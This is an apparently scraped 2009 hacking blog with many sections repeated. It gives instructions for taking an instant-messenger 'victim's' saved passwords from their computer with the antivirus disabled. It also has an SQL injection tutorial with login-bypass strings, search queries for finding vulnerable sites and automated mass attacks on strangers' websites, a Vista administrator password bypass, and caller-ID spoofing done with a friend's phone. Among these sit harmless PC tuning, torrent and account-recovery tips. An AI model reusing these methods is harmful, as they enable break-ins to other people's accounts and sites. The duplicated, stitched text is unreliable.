First you victim must have used a IM(instant messenger) at least once with this id. Say for yahoo he must use yahoo messenger.Online versions dont count.So this means you cannot hack accounts of say facebook or myspace which dont have their IM
Second you must have access to his comp where he has used the IM.
Third he must not have formatted his system recently or he must have used the IM after format.
These requirements are tough, i know.You will hit a jackpot if you are on shared comp as it's not frequently formatted and many use IM.You can even ask him to use the IM on your comp.Once you fullfill these job's almost done.
Now you can use these password recovery software to get hold of your victims password These softwares have high success rate but not 100 %. I am giving all trial download links.If you want the full version visit your fav torrent or rapidshare or megaupload.The will not crack any passwords greater than 4 chars which mean syou cant hack most accounts as they require atleast 6 chars.
You will have to temporarily stop the Antivirus as your antivirus will detect it as spyware. But they are Spyware free !00% safe
MessenPass 1.16
Instant Messengers Password Recovery Master
Advanced Instant Messengers Password Recovery 3.4
Please you them sensibly. Use this only to get lost passwords of your account. If you hack some one's account i wont take responsibility.
Now there are a bit of requirements
First you victim must have used a IM(instant messenger) at least once with this id. Say for yahoo he must use yahoo messenger.Online versions dont count.So this means you cannot hack accounts of say facebook or myspace which dont have their IM
Second you must have access to his comp where he has used the IM.
Third he must not have formatted his system recently or he must have used the IM after format.
These requirements are tough, i know.You will hit a jackpot if you are on shared comp as it's not frequently formatted and many use IM.You can even ask him to use the IM on your comp.Once you fullfill these job's almost done.
Now you can use these password recovery software to get hold of your victims password These softwares have high success rate but not 100 %. I am giving all trial download links.If you want the full version visit your fav torrent or rapidshare or megaupload.The will not crack any passwords greater than 4 chars which mean syou cant hack most accounts as they require atleast 6 chars.
You will have to temporarily stop the Antivirus as your antivirus will detect it as spyware. But they are Spyware free !00% safe
MessenPass 1.16
Instant Messengers Password Recovery Master
Advanced Instant Messengers Password Recovery 3.4
Please you them sensibly. Use this only to get lost passwords of your account. If you hack some one's account i wont take responsibility.
Make your pc faster
1. First, run a scandisk or checkdisk. Let Windows fix any errors.
2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.
3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.
4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)
5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.
6 . Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)
7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.
8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non- essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.
9 . Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1 x, instead of being used at 4x!
10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...
-FOR ADVANCED USERS-
1 . Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).
2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...
3 . Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!
4 . Take a look under the hood (for SCSI owners) What kind of SCSI do you have? If it's the newer Ultra 160 /320 etc cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain...this means that if you have say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 mb/sec) on the same chain as a SCSI cdrom drive (capable of only 40 mb/sec) then the whole bus slows down to the 40 mb/sec speed...use different chains for the slower devices and maximize those hard drives!
5. Run a utility like WCPUID and check the settings...is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)
6. Dig in to the BIOS...check settings like boot order, for example...is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on board peripherals...for instance, - does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your systems' performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps...Also, check to see what your video aperature is set to. If you have a video card with 128 megs of on-baord memory, your aperature should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?
7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware componenet that is not working correctly.
8 . Evaluate the potential for system/hardware upgrades...usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8 x - capable AGP port but you are using an older 4 x video card, update it..
2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.
3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.
4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)
5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.
6 . Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)
7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.
8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non- essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.
9 . Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1 x, instead of being used at 4x!
10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...
-FOR ADVANCED USERS-
1 . Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).
2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...
3 . Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!
4 . Take a look under the hood (for SCSI owners) What kind of SCSI do you have? If it's the newer Ultra 160 /320 etc cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain...this means that if you have say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 mb/sec) on the same chain as a SCSI cdrom drive (capable of only 40 mb/sec) then the whole bus slows down to the 40 mb/sec speed...use different chains for the slower devices and maximize those hard drives!
5. Run a utility like WCPUID and check the settings...is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)
6. Dig in to the BIOS...check settings like boot order, for example...is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on board peripherals...for instance, - does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your systems' performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps...Also, check to see what your video aperature is set to. If you have a video card with 128 megs of on-baord memory, your aperature should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?
7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware componenet that is not working correctly.
8 . Evaluate the potential for system/hardware upgrades...usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8 x - capable AGP port but you are using an older 4 x video card, update it..
List Of Sql Injection Strings..
One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems . First SEARCH the following Keywords in Google or any Search Engine: admin\login.asp
login.asp with these two search string you will have plenty of targets to chose from...choose one that is Vulnerable INJECTION STRINGS: How to use it? This is the easiest part...very simple On the login page just enter something like user:admin (you dont even have to put this.)
pass:' or 1 =1 - or user:' or 1 =1-
admin:' or 1 =1 - Some sites will have just a password so password:' or 1 =1- In fact I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths. The one I am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string combo example: admin:' or a=a-
admin:' or 1 =1 - And so on. You don't have to be admin and still can do anything you want. The most important part is example:' or 1 =1- this is our basic injection string Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever inurl:login.asp
index of:/admin/login.asp like this: index of login.asp result: http://www3 .google.com/search?hl=en&ie=I SO...G=Google+Search 17 ,000 possible targets trying various searches spews out plent more Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login. asp
http://www.another.com/admin /login.asp and so on. In a couple of hours you can build up quite a list because I don't select all results or spider for log in pages. I then save the list fire up Ares and enter 1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start. Now I dont want to go into problems with users using Ares..thing is i know it works for me... Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable. There you go you should have access to your vulnerable target by now Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1 =1 - so it becomes user=' or 1 =1- just as quick as login process Combo List There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.
login.asp with these two search string you will have plenty of targets to chose from...choose one that is Vulnerable INJECTION STRINGS: How to use it? This is the easiest part...very simple On the login page just enter something like user:admin (you dont even have to put this.)
pass:' or 1 =1 - or user:' or 1 =1-
admin:' or 1 =1 - Some sites will have just a password so password:' or 1 =1- In fact I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths. The one I am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string combo example: admin:' or a=a-
admin:' or 1 =1 - And so on. You don't have to be admin and still can do anything you want. The most important part is example:' or 1 =1- this is our basic injection string Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever inurl:login.asp
index of:/admin/login.asp like this: index of login.asp result: http://www3 .google.com/search?hl=en&ie=I SO...G=Google+Search 17 ,000 possible targets trying various searches spews out plent more Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login. asp
http://www.another.com/admin /login.asp and so on. In a couple of hours you can build up quite a list because I don't select all results or spider for log in pages. I then save the list fire up Ares and enter 1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start. Now I dont want to go into problems with users using Ares..thing is i know it works for me... Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable. There you go you should have access to your vulnerable target by now Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1 =1 - so it becomes user=' or 1 =1- just as quick as login process Combo List There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.
Thursday, August 20, 2009
Hack Windows Vista Admin/Administrator Account password.
Please take note that this handy tip is intended to recover/regain a forgotten Vista Administrator password. It is not intended to illegally hacking into a Vista system that's not owning by users who refer this guide!!
It is also intended to inform Vista users about the method by which anyone can access their private accounts by cracking passwords....Thus anyone can hack into administrator account and bypass guest user restrictions....
Lets start...
Steps to hack Windows Vista Administrator account password:
1. Reboot the Windows Vista and boot up with Windows Vista installation DVD.
Crack Windows Vista logon account password in minute with the Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.
2. While the Windows Vista installation interface pops up, click the Repair You Computer link at the bottom-left corner.
3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing Windows Vista, looks like Recovery Console in Windows XP:
Startup Repair options is used to automatically fix problems that are preventing Windows Vista from starting.
System Restore to restore Windows Vista setting to an earlier point in time.
Windows Complete PC Restore to restore Windows Vista from a full system backup.
Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that bundled with Windows setup media.
Command Prompt is the target option of this Vista hacking guide. Click on this option now.
4. In the Windows Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.
5. Click on the File menu, select Add / Remove Snap-in option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.
6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button - that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.
7. Click OK button and return to MMC windows. Under the Root Console in left panel, double- click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.
Select the Set Password from the right-click menu to set a new password / reset old password.
Note this does not work on all versions of Vista. But, it can be used to hack administrator account password of Windows Vista...
Further Read:
Hacking Password Protected Laptops
Vista tips,tricks and tweaks
Activate Administrative shares on Vista
It is also intended to inform Vista users about the method by which anyone can access their private accounts by cracking passwords....Thus anyone can hack into administrator account and bypass guest user restrictions....
Lets start...
Steps to hack Windows Vista Administrator account password:
1. Reboot the Windows Vista and boot up with Windows Vista installation DVD.
Crack Windows Vista logon account password in minute with the Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.
2. While the Windows Vista installation interface pops up, click the Repair You Computer link at the bottom-left corner.
3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing Windows Vista, looks like Recovery Console in Windows XP:
Startup Repair options is used to automatically fix problems that are preventing Windows Vista from starting.
System Restore to restore Windows Vista setting to an earlier point in time.
Windows Complete PC Restore to restore Windows Vista from a full system backup.
Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that bundled with Windows setup media.
Command Prompt is the target option of this Vista hacking guide. Click on this option now.
4. In the Windows Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.
5. Click on the File menu, select Add / Remove Snap-in option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.
6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button - that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.
7. Click OK button and return to MMC windows. Under the Root Console in left panel, double- click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.
Select the Set Password from the right-click menu to set a new password / reset old password.
Note this does not work on all versions of Vista. But, it can be used to hack administrator account password of Windows Vista...
Further Read:
Hacking Password Protected Laptops
Vista tips,tricks and tweaks
Activate Administrative shares on Vista
Tuesday, August 18, 2009
What to Do when Ur Orkut is Hacked!
It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
1. Reset Your Google Account Password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotP asswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn't use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original "Google Email Verification" message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
1. Reset Your Google Account Password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotP asswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn't use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original "Google Email Verification" message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
Monday, August 17, 2009
Hack torrent to get the most of it... A liltle info ...
This tutorial will help u hack torrent to increase ur torrent download speed while using torrent software like Bittorrent, Azureaus, Bitcomet....Thus, you will be able to download torrent movies,music, videos and warez all at high speed.
It also explains all torrent concepts....just get most of torrent....
What is a torrent?
A torrent file is used by a torrent client to download various files likes movies, music, warez,etc. Just think of it as a set of instructions that tell the torrent client what to download. Torrent files are usually only a few kB big, but can be used download much bigger files.
The Anatomy of a torrent
When browsing torrent sites, you'll notice a lot of information regarding a torrent. Here are the 3 main terms associated with a torrent file:
Leech: A peer - or any client that does not have 100% of the data.
Seeder: A seeder is a peer that has a complete copy of the torrent and still offers it for upload. The more seeders there are, the better the chances are for completion of the file.
Peer: A peer is one instance of a BitTorrent client running on a computer on the Internet that other clients connect to and transfer data.
Torrent Clients
A torrent client is basically a program that you open a torrent in, allowing a particular file to be downloaded to your computer. There are many free torrent clients on the internet. These include BitComet, Azureus and uTorrent. Many torrent sites however, have banned clients such as BitComet, as it gives a better download speed than upload speed, meaning that people don't share their data, which is what torrents are all about. Personally, I recommend uTorrent. Its fast, simple and easy to use.
Downloading
***For any examples given, please note I will be referring to uTorrent on Windows***
***It should also be noted that torrents take a while to get started properly. I recommend you wait at least half an hour before really investigating the issue of poor download speeds***
Okay, so let me begin. You've just come across a torrent you really want. So, naturally enough you open it in a torrent client. So you're sitting there with a torrent. Downloading. One thing though, the download rate is shit, right? This is a common among torrent users, so don't blame your computer. There are a number of reasons for the poor download rates, some of which I will discuss below.
Routers
Ah routers. These are one of the main limiting factors of a torrent's download rate. Basically your router has to have specific ports open on it to allow connections from other peers.
This is called port forwarding. I won't go into detail here, as theres enough information for its own article, but I will tell you to go to www.portforward.com. It contains specific configurations for almost every router and program combination under the sun (Sorry). Just follow the instructions, and you should be downloading with great speeds in no time. If not, just read on below!
Firewalls
Okay, in uTorrent go to Options>Preferences>Connection you should see "Port used for incoming connections" and a box beside it. In the box there should be a number. Take note of it, its the port number that uTorrent is listening to for connections. Okay, now go into the control panel on Windows, and double click the "Windows Firewall" icon.Click the "Exceptions" tab and click "Add Port". For name type "TorrentTCP", for port type the port number you took note of earlier, and click TCP, then hit "OK". Repeat the process except this time, for name type "TorrentUDP", for port enter the same as before, and click UDP, then hit "OK". Okay, go check the downlaod speeds on your torrent, if its not improved then read on my friends.
Torrent Client Hacking
Okay guys, my saving grace. A lot of this section is taken from www.torrentfreak.com so big up to those guys.
1. Hack the max half-open TCP connections
If you're on XP sp2 , your TCP connections are limited to a maximum of 10. This might hurt your downloading speed because it wont let you connect to as much peers as you want. It is supposed to slow down viruses because their spreading strategy is to connect to a high amount of ip numbers, but it could cripple your torrent downloads. A nice way to fix this is to download this patch http://lvllord.de/?lang=en&url =downloads also http://torrentfreak.com/evid4 226 patch223d-enzip/
Note: Some people report that their antivir reports the patch to be a Virus, This is not the case.
Check out www.lvllord.de for more details on this.
The patch allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok (more is NOT always better).
Next you need to configure your torrent client to allow 50- 100 max half-open TCP connections
In uTorrent, go to: Options>Preferences>Advanced options>net.max_halfopen and change its value to 80
then hit "Set" and "OK".
2. Maximum upload speed
Probably the most important setting there is. Your connection is (sort of) like a pipeline, if you use you maximum upload speed there's not enough space left for the files you are downloading. So you have to cap your upload speed.
Use the following formula to determine your optimal upload speed¦
80% of your maximum upload speed
so if your maximum upload speed is 40 kB/s, the optimal upload rate is 32kB/s
But keep seeding!
It also explains all torrent concepts....just get most of torrent....
What is a torrent?
A torrent file is used by a torrent client to download various files likes movies, music, warez,etc. Just think of it as a set of instructions that tell the torrent client what to download. Torrent files are usually only a few kB big, but can be used download much bigger files.
The Anatomy of a torrent
When browsing torrent sites, you'll notice a lot of information regarding a torrent. Here are the 3 main terms associated with a torrent file:
Leech: A peer - or any client that does not have 100% of the data.
Seeder: A seeder is a peer that has a complete copy of the torrent and still offers it for upload. The more seeders there are, the better the chances are for completion of the file.
Peer: A peer is one instance of a BitTorrent client running on a computer on the Internet that other clients connect to and transfer data.
Torrent Clients
A torrent client is basically a program that you open a torrent in, allowing a particular file to be downloaded to your computer. There are many free torrent clients on the internet. These include BitComet, Azureus and uTorrent. Many torrent sites however, have banned clients such as BitComet, as it gives a better download speed than upload speed, meaning that people don't share their data, which is what torrents are all about. Personally, I recommend uTorrent. Its fast, simple and easy to use.
Downloading
***For any examples given, please note I will be referring to uTorrent on Windows***
***It should also be noted that torrents take a while to get started properly. I recommend you wait at least half an hour before really investigating the issue of poor download speeds***
Okay, so let me begin. You've just come across a torrent you really want. So, naturally enough you open it in a torrent client. So you're sitting there with a torrent. Downloading. One thing though, the download rate is shit, right? This is a common among torrent users, so don't blame your computer. There are a number of reasons for the poor download rates, some of which I will discuss below.
Routers
Ah routers. These are one of the main limiting factors of a torrent's download rate. Basically your router has to have specific ports open on it to allow connections from other peers.
This is called port forwarding. I won't go into detail here, as theres enough information for its own article, but I will tell you to go to www.portforward.com. It contains specific configurations for almost every router and program combination under the sun (Sorry). Just follow the instructions, and you should be downloading with great speeds in no time. If not, just read on below!
Firewalls
Okay, in uTorrent go to Options>Preferences>Connection you should see "Port used for incoming connections" and a box beside it. In the box there should be a number. Take note of it, its the port number that uTorrent is listening to for connections. Okay, now go into the control panel on Windows, and double click the "Windows Firewall" icon.Click the "Exceptions" tab and click "Add Port". For name type "TorrentTCP", for port type the port number you took note of earlier, and click TCP, then hit "OK". Repeat the process except this time, for name type "TorrentUDP", for port enter the same as before, and click UDP, then hit "OK". Okay, go check the downlaod speeds on your torrent, if its not improved then read on my friends.
Torrent Client Hacking
Okay guys, my saving grace. A lot of this section is taken from www.torrentfreak.com so big up to those guys.
1. Hack the max half-open TCP connections
If you're on XP sp2 , your TCP connections are limited to a maximum of 10. This might hurt your downloading speed because it wont let you connect to as much peers as you want. It is supposed to slow down viruses because their spreading strategy is to connect to a high amount of ip numbers, but it could cripple your torrent downloads. A nice way to fix this is to download this patch http://lvllord.de/?lang=en&url =downloads also http://torrentfreak.com/evid4 226 patch223d-enzip/
Note: Some people report that their antivir reports the patch to be a Virus, This is not the case.
Check out www.lvllord.de for more details on this.
The patch allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok (more is NOT always better).
Next you need to configure your torrent client to allow 50- 100 max half-open TCP connections
In uTorrent, go to: Options>Preferences>Advanced options>net.max_halfopen and change its value to 80
then hit "Set" and "OK".
2. Maximum upload speed
Probably the most important setting there is. Your connection is (sort of) like a pipeline, if you use you maximum upload speed there's not enough space left for the files you are downloading. So you have to cap your upload speed.
Use the following formula to determine your optimal upload speed¦
80% of your maximum upload speed
so if your maximum upload speed is 40 kB/s, the optimal upload rate is 32kB/s
But keep seeding!
Sunday, August 16, 2009
Make anonymous phone calls
This is basically novice trick, doesn't get into the principles of VoIP and telecom. Demonstrates the security lapses a VoIP telephone service provider named TABRIO This is the kind of small hack to use a service to make fun in the friends phones. First of all i will tell my story..that how i make my friends fool out this stuff. Last night while speaking to my friend I lost the call as my prepaid airtime ran out. Desperate to speak, I looked for options, I sat for a moment and got immediately to my PC. I Just googled to call free and i found one. During the process i got my hands on this free service called TABRIO.Now i could call her. ( Tabrio provides $5 airtime free) No big deal, a lot of VoIP based internet calling service give free talktime, what's great about Tabrio is the caller ID spoofing thing you can play with. What is Call Spoofing :-
The call spoofing is the small hacking in telephone network to display a phone number of recipient's phone number and in reality that no is not calling from that number. What all you have to do to make a free call :-a)You should own one Email address.
b)You shoud have one personal mobile connection.
c)Make a free account in 2 minutes.( www.tabrio.com )
c)Get upto 30 mins to call all around the world on any phone services.
d)Go with the steps given there.
e)Make a call.
f)Enjoy and share your experience with us.
How to make call spoofing on friends Phone number :-a)You shoud own one Email address different from the above email address.
b)Just take your friends phone for 3 mintues.
c)Just make the account in www.tabrio.com
d)Confirm the phone number and enter the 4 digit number, which is shown on the PC screen.(be fast friend can come any time)
e)Now you can spoof any call to your friends phone number. You can even call from a number like 123456786 or 0000000000.
f)Get upto 30 Minutes to call all around the world on any phone services.
The intent of this post is for recreational purpose. Do not use the above methods to do anything that could land you up in trouble.
After trying, Share your experiences/problems with me...RoneY
The call spoofing is the small hacking in telephone network to display a phone number of recipient's phone number and in reality that no is not calling from that number. What all you have to do to make a free call :-a)You should own one Email address.
b)You shoud have one personal mobile connection.
c)Make a free account in 2 minutes.( www.tabrio.com )
c)Get upto 30 mins to call all around the world on any phone services.
d)Go with the steps given there.
e)Make a call.
f)Enjoy and share your experience with us.
How to make call spoofing on friends Phone number :-a)You shoud own one Email address different from the above email address.
b)Just take your friends phone for 3 mintues.
c)Just make the account in www.tabrio.com
d)Confirm the phone number and enter the 4 digit number, which is shown on the PC screen.(be fast friend can come any time)
e)Now you can spoof any call to your friends phone number. You can even call from a number like 123456786 or 0000000000.
f)Get upto 30 Minutes to call all around the world on any phone services.
The intent of this post is for recreational purpose. Do not use the above methods to do anything that could land you up in trouble.
After trying, Share your experiences/problems with me...RoneY
Friday, August 14, 2009
Hack orkut passwords
Orkut is the highly successful social networking site in Brazil, India, and Pakistan. Orkut is much more famous than any of the other social networking sites such as Facebook and Myspace in these countries. The Orkut demographics show the penetration of this social networking tool with above 51% from Brazil ( http://www.orkut.co.in/Main# MembersAll.aspx ). Developed by Orkut Büyükkökten and later bought by Google,this social networking tool is growing far greater than any one else. With its popularity grows the need of hacking into some ones Orkut account. We are getting so many comments on several pages in this website on how to break into an Orkut account; how to break Orkut Password etc.As always our humble reply, we don't endorse hacking. We will not help anyone out to break into Orkut account nor provide any help if they have forgotten the passwords. One thing people forget is that Orkut just like any other web based service store the password in encrypted format and just not possible to figure out the password even with the help of employees who are working there. How is it possible? Without going into technical details, let us explain things in a simple way. When you register for a web based service you provide the password; one thing most trusted websites does is that it encrypt the password provided by you. The encryption is not reversible ie no one can decode the string back to the original format. Suppose you have the password "MyPassword" this password is stored in the Orkut (or any other server) in encrypted format... something like - MyPassword => khkjhd877 e8 q78 e8634 but3874 @63. There are several encryption techniques available like MD5 , SHA etc. These encryption algorithms are not reversible ie you can convert MyPassword to khkjhd877 e8 q78 e8634 but3874 @63 but khkjhd877 e8 q78 e8634 but3874 @63 can't be converted back to MyPassword. When ever you enter the user name and password, the website convert your password into Md5 or sha or what ever it is and cross check. So not even an Google employee can retrieve your password. Well, it can be reset. Orkut passwords could be compromised only if you are
Using a computer with a Keylogger installed
Using a computer affected with some Trojan or virus
Using other websites where you have used the same password and which is not encrypted
So next time before thinking about hijacking the friends Orkut account, remember it's not that easy.
Using a computer with a Keylogger installed
Using a computer affected with some Trojan or virus
Using other websites where you have used the same password and which is not encrypted
So next time before thinking about hijacking the friends Orkut account, remember it's not that easy.
Friday, July 31, 2009
Google search hacking
Well if u ask me this is the best Part " how to Search ",Anyone anywhere needs something out of the great "www", now if u know how to grab hold to "something" in one click that is the skill, this article henceforth is one of my best my best, n especially crafted to meet all your needs !!
Google Operators:
Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers' weapons
